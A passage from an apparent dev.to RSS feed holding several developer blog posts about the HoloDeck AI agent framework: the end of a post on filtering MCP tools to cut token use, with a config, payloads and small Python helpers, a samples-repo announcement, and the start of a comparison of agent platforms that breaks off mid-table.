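&lt;p&gt;So for a query that scores &lt;code&gt;brave_web_search&lt;/code&gt; highest, low-scoring memory tools drop out, but anything in &lt;code&gt;always_include&lt;/code&gt; survives no matter what.&lt;/p&gt;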

&lt;p&gt;Here's the full agent configuration I was testing with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# HoloDeck Research Agent Configuration
name: "research-agent"
description: "Research analysis AI assistant"

model:
  provider: azure_openai
  name: gpt-5.2

instructions:
  file: instructions/system-prompt.md

# Tools Configuration
tools:
  # Vectorstore for research paper search
  - type: vectorstore
    name: search_papers
    description: Search research papers and documents for relevant passages
    source: data/papers_index.json
    embedding_model: text-embedding-3-small
    top_k: 5
    database:
      provider: chromadb

  # Brave Search MCP Server (exposes 6 functions)
  - type: mcp
    name: brave_search
    description: Web search using Brave Search API
    command: npx
    args: ["-y", "@brave/brave-search-mcp-server"]
    env:
      BRAVE_API_KEY: ${BRAVE_API_KEY}

  # Memory MCP Server (exposes 9 functions)
  - type: mcp
    name: memory
    description: Persistent memory using local knowledge graph
    command: npx
    args: ["-y", "@modelcontextprotocol/server-memory"]

# Tool Filtering - This is where the magic happens
tool_filtering:
  enabled: true
  top_k: 5
  similarity_threshold: 0.5
  always_include:
    - search_papers
  always_include_top_n_used: 0
  search_method: hybrid

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three tool sources. 16 total functions exposed. Without filtering, every request sends all 16 tool schemas.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Results
&lt;/h2&gt;

&lt;p&gt;Let me show you actual API payloads. With filtering &lt;strong&gt;off&lt;/strong&gt; , here's what gets sent for a simple "hi there":&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
  "messages": [
    {"role": "system", "content": "# System Prompt for research-agent..."},
    {"role": "user", "content": "hi there"}
  ],
  "model": "gpt-5.2",
  "tools": [
    {"type": "function", "function": {"name": "vectorstore-search_papers", "description": "Search research papers...", "parameters": {...}}},
    {"type": "function", "function": {"name": "brave_search-brave_image_search", "description": "Performs an image search...", "parameters": {"properties": {"query": {...}, "country": {...}, "search_lang": {...}, "count": {...}, "safesearch": {...}, "spellcheck": {...}}, ...}}},
    {"type": "function", "function": {"name": "brave_search-brave_local_search", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_news_search", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_summarizer", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_video_search", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_web_search", ...}},
    {"type": "function", "function": {"name": "memory-add_observations", ...}},
    {"type": "function", "function": {"name": "memory-create_entities", ...}},
    {"type": "function", "function": {"name": "memory-create_relations", ...}},
    {"type": "function", "function": {"name": "memory-delete_entities", ...}},
    {"type": "function", "function": {"name": "memory-delete_observations", ...}},
    {"type": "function", "function": {"name": "memory-delete_relations", ...}},
    {"type": "function", "function": {"name": "memory-open_nodes", ...}},
    {"type": "function", "function": {"name": "memory-read_graph", ...}},
    {"type": "function", "function": {"name": "memory-search_nodes", ...}}
  ]
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;16 tools. 5,888 tokens.&lt;/strong&gt; For "hi there."&lt;/p&gt;

&lt;p&gt;Look at those Brave Search parameter schemas—country code enums, language preferences, pagination options, safesearch filters. Each tool definition is a token hog.&lt;/p&gt;

&lt;p&gt;With filtering &lt;strong&gt;on&lt;/strong&gt; :&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
  "messages": [
    {"role": "system", "content": "# System Prompt for research-agent..."},
    {"role": "user", "content": "hi there"}
  ],
  "model": "gpt-5.2",
  "tools": [
    {"type": "function", "function": {"name": "vectorstore-search_papers", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_web_search", ...}}
  ]
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;2 tools. 1,016 tokens.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;That's an &lt;strong&gt;83% reduction&lt;/strong&gt; —from 5,888 tokens down to 1,016.&lt;/p&gt;

&lt;p&gt;The logs tell the story:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Tool filtering: 2/16 tools selected for query: 'hi there...'
Selected tools: ['vectorstore-search_papers', 'brave_search-brave_web_search']

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For a real research query like "Find papers on transformer architectures on the web", the filtering gets smarter:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Tool filtering: 3/16 tools selected
Selected tools: ['vectorstore-search_papers', 'brave_search-brave_web_search', 'memory-search_nodes']

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The right tools. Automatically. Based on what the user actually asked.&lt;/p&gt;

&lt;h2&gt;
  
  
  Lessons Learned
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;1. MCP servers are tool factories.&lt;/strong&gt; A single MCP server can expose dozens of functions. Without filtering, your token costs explode.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Tokenization matters for BM25.&lt;/strong&gt; Make sure your tokenizer splits on underscores so &lt;code&gt;brave_web_search&lt;/code&gt; becomes &lt;code&gt;["brave", "web", "search"]&lt;/code&gt;. Otherwise keyword matching fails on tool names.&lt;/p&gt;
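&lt;p&gt;A minimal tokenizer that handles this (a sketch, not HoloDeck's exact implementation):&lt;/p&gt;

```python
import re

def tokenize(text: str) -> list[str]:
    # Split on anything non-alphanumeric so snake_case tool names
    # like "brave_web_search" break into matchable keywords.
    return [token for token in re.split(r"[^a-z0-9]+", text.lower()) if token]
```

&lt;p&gt;With this, &lt;code&gt;tokenize("brave_web_search")&lt;/code&gt; yields &lt;code&gt;["brave", "web", "search"]&lt;/code&gt;, so a query containing "web search" actually matches the tool name.&lt;/p&gt;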

&lt;p&gt;&lt;strong&gt;3. Normalize your search scores.&lt;/strong&gt; Raw BM25 scores range from 0-10+, and raw RRF scores are tiny (0.01-0.03). Both need normalization to 0-1 range, or your &lt;code&gt;similarity_threshold&lt;/code&gt; won't work consistently. Semantic search (cosine similarity) is already 0-1.&lt;/p&gt;
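&lt;p&gt;One simple way to do this (an illustrative sketch, assuming per-tool scores in a dict): divide every score by the top score, so the best match is always 1.0 and the threshold becomes relative.&lt;/p&gt;

```python
def normalize_scores(scores: dict) -> dict:
    # Scale scores relative to the top result so raw BM25 (0-10+) and
    # tiny RRF scores (0.01-0.03) both land in the same 0-1 range.
    if not scores:
        return {}
    top = max(scores.values())
    if top <= 0:
        return {name: 0.0 for name in scores}
    return {name: score / top for name, score in scores.items()}
```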

&lt;p&gt;&lt;strong&gt;4. After normalization, thresholds are consistent.&lt;/strong&gt; With all methods normalized, good matches score 0.8-1.0 for BM25/hybrid, and 0.4-0.6 for semantic. A threshold of 0.5 works well across methods.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. always_include is your safety net.&lt;/strong&gt; Some tools are so core to your agent that you never want them filtered out. Make that explicit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;6. Be careful with always_include_top_n_used.&lt;/strong&gt; This feature tracks usage and auto-includes frequently used tools. Sounds great, but early/accidental usage can bias future requests. Keep it at 0 during development.&lt;/p&gt;

&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;p&gt;This is just tool filtering. Anthropic's post also covers:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Programmatic tool calling&lt;/strong&gt; : Let the model write code to process intermediate results&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tool use examples&lt;/strong&gt; : Providing concrete usage patterns to reduce parameter ambiguity&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I might implement those next. But for now, getting 83% token reduction with a few hundred lines of code feels pretty good.&lt;/p&gt;




&lt;p&gt;The full implementation is in &lt;a href="https://github.com/justinbarias/holodeck/tree/main/src/holodeck/lib/tool_filter" rel="noopener noreferrer"&gt;HoloDeck's tool_filter module&lt;/a&gt;. PRs welcome.&lt;/p&gt;

</description>
      <category>tokens</category>
      <category>anthropic</category>
      <category>tool</category>
      <category>search</category>
    </item>
    <item>
      <title>[Boost]</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 09 Jan 2026 22:27:13 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/-4i0</link>
      <guid>https://dev.to/jeremiahbarias/-4i0</guid>
      <description>&lt;div class="ltag__link"&gt;
  &lt;a href="/jeremiahbarias" class="ltag__link__link"&gt;
    &lt;div class="ltag__link__pic"&gt;
      &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3648698%2F59543698-c63b-4cb4-b342-f9924f3ae907.png" alt="jeremiahbarias"&gt;
    &lt;/div&gt;
  &lt;/a&gt;
  &lt;a href="https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82" class="ltag__link__link"&gt;
    &lt;div class="ltag__link__content"&gt;
      &lt;h2&gt;HoloDeck Part 1: Why Building AI Agents Feels So Broken&lt;/h2&gt;
      &lt;h3&gt;Jeremiah Justin Barias ・ Dec 6 '25&lt;/h3&gt;
      &lt;div class="ltag__link__taglist"&gt;
        &lt;span class="ltag__link__tag"&gt;#ai&lt;/span&gt;
        &lt;span class="ltag__link__tag"&gt;#agents&lt;/span&gt;
        &lt;span class="ltag__link__tag"&gt;#evals&lt;/span&gt;
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/a&gt;
&lt;/div&gt;


</description>
      <category>ai</category>
      <category>agents</category>
      <category>evals</category>
    </item>
    <item>
      <title>Holodeck samples</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 09 Jan 2026 22:23:43 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/holodeck-samples-1ec2</link>
      <guid>https://dev.to/jeremiahbarias/holodeck-samples-1ec2</guid>
      <description>&lt;p&gt;If you want to get moving fast with HoloDeck, this samples repo is the quickest on-ramp. It's a set of ready-to-run examples you can run, poke around in, and fork as templates:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/justinbarias/holodeck-samples" rel="noopener noreferrer"&gt;https://github.com/justinbarias/holodeck-samples&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Configuring Prerequisites&lt;/li&gt;
&lt;li&gt;Explore the use cases&lt;/li&gt;
&lt;li&gt;Coding assistant integration (Claude Code, GitHub Copilot)&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Configuring Prerequisites
&lt;/h2&gt;

&lt;p&gt;You'll need a handful of things installed to run the samples locally:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Clone the repo&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Install HoloDeck CLI&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Grab the supporting tools&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Fire up the shared infrastructure&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pick a sample + provider&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Fire up the agent and frontend&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Explore the use cases
&lt;/h2&gt;

&lt;p&gt;Here are the four use cases, each with OpenAI, Azure OpenAI, and Ollama flavors:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Ticket Routing&lt;/strong&gt; (&lt;code&gt;ticket-routing/&lt;/code&gt;) - Routes support tickets with structured outputs and confidence scores.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Customer Support&lt;/strong&gt; (&lt;code&gt;customer-support/&lt;/code&gt;) - RAG-powered chatbot with memory and escalation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Content Moderation&lt;/strong&gt; (&lt;code&gt;content-moderation/&lt;/code&gt;) - Multi-category moderation with policy enforcement and consistency checks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Legal Summarization&lt;/strong&gt; (&lt;code&gt;legal-summarization/&lt;/code&gt;) - Clause extraction, risk flags, and summary quality metrics.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each sample sticks to the same layout, so you can find stuff fast:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;use-case&amp;gt;/&amp;lt;provider&amp;gt;/
├── agent.yaml
├── config.yaml
├── .env.example
├── instructions/
├── data/
└── copilotkit/

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Coding assistant integration (Claude Code, GitHub Copilot)
&lt;/h2&gt;

&lt;p&gt;The repo also comes with built-in prompts for both Claude Code and GitHub Copilot to speed up agent authoring and tuning.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Slash commands live in &lt;code&gt;.claude/commands/&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/holodeck.create&lt;/code&gt; - Guided wizard for creating a new agent&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/holodeck.tune path/to/agent.yaml&lt;/code&gt; - Tuning helper that boosts test performance&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;GitHub Copilot&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Prompt files live in &lt;code&gt;.github/prompts/&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;holodeck-create&lt;/code&gt; and &lt;code&gt;holodeck-tune&lt;/code&gt; provide the same workflows as guided prompts&lt;/li&gt;
&lt;li&gt;In VS Code, type &lt;code&gt;/&lt;/code&gt; or &lt;code&gt;#prompt:&lt;/code&gt; in Copilot Chat to launch them&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Both tools are great for small, reviewable tweaks. Keep secrets out of prompts, and sanity-check changes by running the sample after edits.&lt;/p&gt;




&lt;p&gt;Star, clone, fork, or use however you like! If you run into issues, file them &lt;a href="https://github.com/justinbarias/holodeck-samples/issues" rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>holodeck</category>
      <category>ai</category>
      <category>agents</category>
    </item>
    <item>
      <title>HoloDeck Part 2: What's Out There for AI Agents</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 15 Nov 2024 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880</link>
      <guid>https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880</guid>
      <description>&lt;p&gt;In &lt;a href="https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82"&gt;Part 1&lt;/a&gt;, I talked about why agent development feels broken. Before building something myself, I spent time looking at what's already out there. Here's what I found.&lt;/p&gt;




&lt;h2&gt;
  
  
  This is Part 2 of a 3-Part Series
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82"&gt;Why It Feels Broken&lt;/a&gt; - What's wrong with agent development&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What's Out There&lt;/strong&gt; (You are here)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-3-how-im-approaching-agent-development-4gck"&gt;What I'm Building&lt;/a&gt; - HoloDeck's approach and how it works&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  The Landscape
&lt;/h2&gt;

&lt;p&gt;A bunch of platforms tackle parts of this problem. I wanted something open-source, self-hosted, and config-driven—something that fits into existing CI/CD workflows without vendor lock-in. That shaped how I evaluated these tools.&lt;/p&gt;




&lt;h2&gt;
  
  
  Developer Tools &amp;amp; Frameworks
&lt;/h2&gt;

&lt;h3&gt;
  
  
  LangSmith (LangChain Team)
&lt;/h3&gt;

&lt;p&gt;LangSmith is really good at what it does—production observability and tracing for LangChain apps. If you're already in the LangChain ecosystem and need monitoring, it's solid.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;What I want&lt;/th&gt;
&lt;th&gt;LangSmith&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deployment Model&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Self-hosted (open-source)&lt;/td&gt;
&lt;td&gt;SaaS only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI-based, works in any pipeline&lt;/td&gt;
&lt;td&gt;API-based, needs cloud connectivity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Definition&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pure YAML&lt;/td&gt;
&lt;td&gt;Python code + LangChain SDK&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Primary Focus&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Agent experimentation &amp;amp; deployment&lt;/td&gt;
&lt;td&gt;Production observability &amp;amp; tracing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Orchestration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Multi-agent patterns&lt;/td&gt;
&lt;td&gt;Not designed for multi-agent workflows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Evaluation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom criteria, LLM-as-judge, NLP metrics (BLEU, METEOR, ROUGE, F1)&lt;/td&gt;
&lt;td&gt;LLM-as-judge, custom evaluators&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted LLMs&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native support (Ollama, vLLM, OpenAI-compatible)&lt;/td&gt;
&lt;td&gt;Via LangChain integrations&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Different tools for different problems. LangSmith is about monitoring production apps; I was looking for something to help with the build-and-test loop.&lt;/p&gt;




&lt;h3&gt;
  
  
  MLflow GenAI (Databricks)
&lt;/h3&gt;

&lt;p&gt;MLflow is a beast for ML experiment tracking. Their GenAI additions are interesting, but it's designed for model comparison rather than agent workflows. If you're already using MLflow for ML ops, the GenAI features slot in nicely.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;What I want&lt;/th&gt;
&lt;th&gt;MLflow GenAI&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI-native&lt;/td&gt;
&lt;td&gt;Python SDK + REST API&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Infrastructure&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Lightweight, portable&lt;/td&gt;
&lt;td&gt;Heavy (ML tracking server, often Databricks)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Support&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Purpose-built for agents&lt;/td&gt;
&lt;td&gt;Focused on model evaluation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Multi-Agent&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native orchestration patterns&lt;/td&gt;
&lt;td&gt;Single model/variant comparison&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Complexity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Minimal (YAML)&lt;/td&gt;
&lt;td&gt;Higher (ML engineering mindset)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Evaluation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom criteria, LLM-as-judge, NLP metrics&lt;/td&gt;
&lt;td&gt;LLM-as-judge, custom scorers&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The infrastructure overhead was the main thing that put me off. I wanted something lighter.&lt;/p&gt;




&lt;h3&gt;
  
  
  Microsoft PromptFlow
&lt;/h3&gt;

&lt;p&gt;PromptFlow has a nice visual approach—you can see your flows as graphs, which is great for understanding what's happening. But it's really about individual functions and tools, not full agent orchestration.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;What I want&lt;/th&gt;
&lt;th&gt;PromptFlow&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI-first&lt;/td&gt;
&lt;td&gt;Python SDK, Azure-centric&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Scope&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Full agent lifecycle&lt;/td&gt;
&lt;td&gt;Individual tools &amp;amp; functions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Design Target&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Multi-agent workflows&lt;/td&gt;
&lt;td&gt;Single tool/AI function development&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Configuration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pure YAML&lt;/td&gt;
&lt;td&gt;Visual flow graphs + low-code Python&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Orchestration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Multi-agent patterns&lt;/td&gt;
&lt;td&gt;Not designed for multi-agent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Limited (designed for Azure)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Evaluation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom criteria, LLM-as-judge, NLP metrics&lt;/td&gt;
&lt;td&gt;LLM-as-judge (GPT-based), F1/BLEU/ROUGE&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If you're building individual AI functions and live in Azure, PromptFlow makes sense. For agent-level work, it's not quite there.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Cloud Providers
&lt;/h2&gt;

&lt;p&gt;All three major clouds have agent platforms now. They're impressive, but they come with the obvious trade-off: you're locked into their ecosystem.&lt;/p&gt;

&lt;h3&gt;
  
  
  Azure AI Foundry (Microsoft)
&lt;/h3&gt;

&lt;p&gt;Azure AI Foundry is Microsoft's enterprise play. It integrates with the whole Microsoft stack—Teams, Copilot, etc. If you're already a Microsoft shop, there's a lot to like.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;What I want&lt;/th&gt;
&lt;th&gt;Azure AI Foundry&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deployment Model&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Self-hosted (open-source)&lt;/td&gt;
&lt;td&gt;SaaS (Azure-dependent)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI, works anywhere&lt;/td&gt;
&lt;td&gt;Azure DevOps/GitHub Actions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Definition&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pure YAML&lt;/td&gt;
&lt;td&gt;YAML Workflows and Prompt agents&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Primary Focus&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Experimentation &amp;amp; deployment&lt;/td&gt;
&lt;td&gt;Enterprise agent orchestration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Orchestration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Multi-agent patterns&lt;/td&gt;
&lt;td&gt;Multi-agent via Agents Framework or Workflows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No (Azure required)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Evaluation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom criteria, LLM-as-judge, NLP&lt;/td&gt;
&lt;td&gt;LLM-as-judge, NLP metrics&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The workflows and prompt-based agents are interesting, but you're still hard-locked into the Foundry offering.&lt;/p&gt;




&lt;h3&gt;
  
  
  Amazon Bedrock AgentCore (AWS)
&lt;/h3&gt;

&lt;p&gt;Bedrock AgentCore is AWS's managed agent service. Good for running agents at scale if you're already on AWS and using their model offerings.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;What I want&lt;/th&gt;
&lt;th&gt;Amazon Bedrock AgentCore&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deployment Model&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Self-hosted (open-source)&lt;/td&gt;
&lt;td&gt;SaaS (AWS-managed)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI, works anywhere&lt;/td&gt;
&lt;td&gt;AWS CodePipeline / API-based&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Definition&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pure YAML&lt;/td&gt;
&lt;td&gt;Code (SDK + LangGraph, CrewAI, etc.)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Primary Focus&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Experimentation &amp;amp; deployment&lt;/td&gt;
&lt;td&gt;Enterprise agent operations at scale&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Orchestration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Multi-agent patterns&lt;/td&gt;
&lt;td&gt;Multi-agent collaboration (supervisor modes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No (AWS required)&lt;/td&gt;
&lt;/tr&gt;
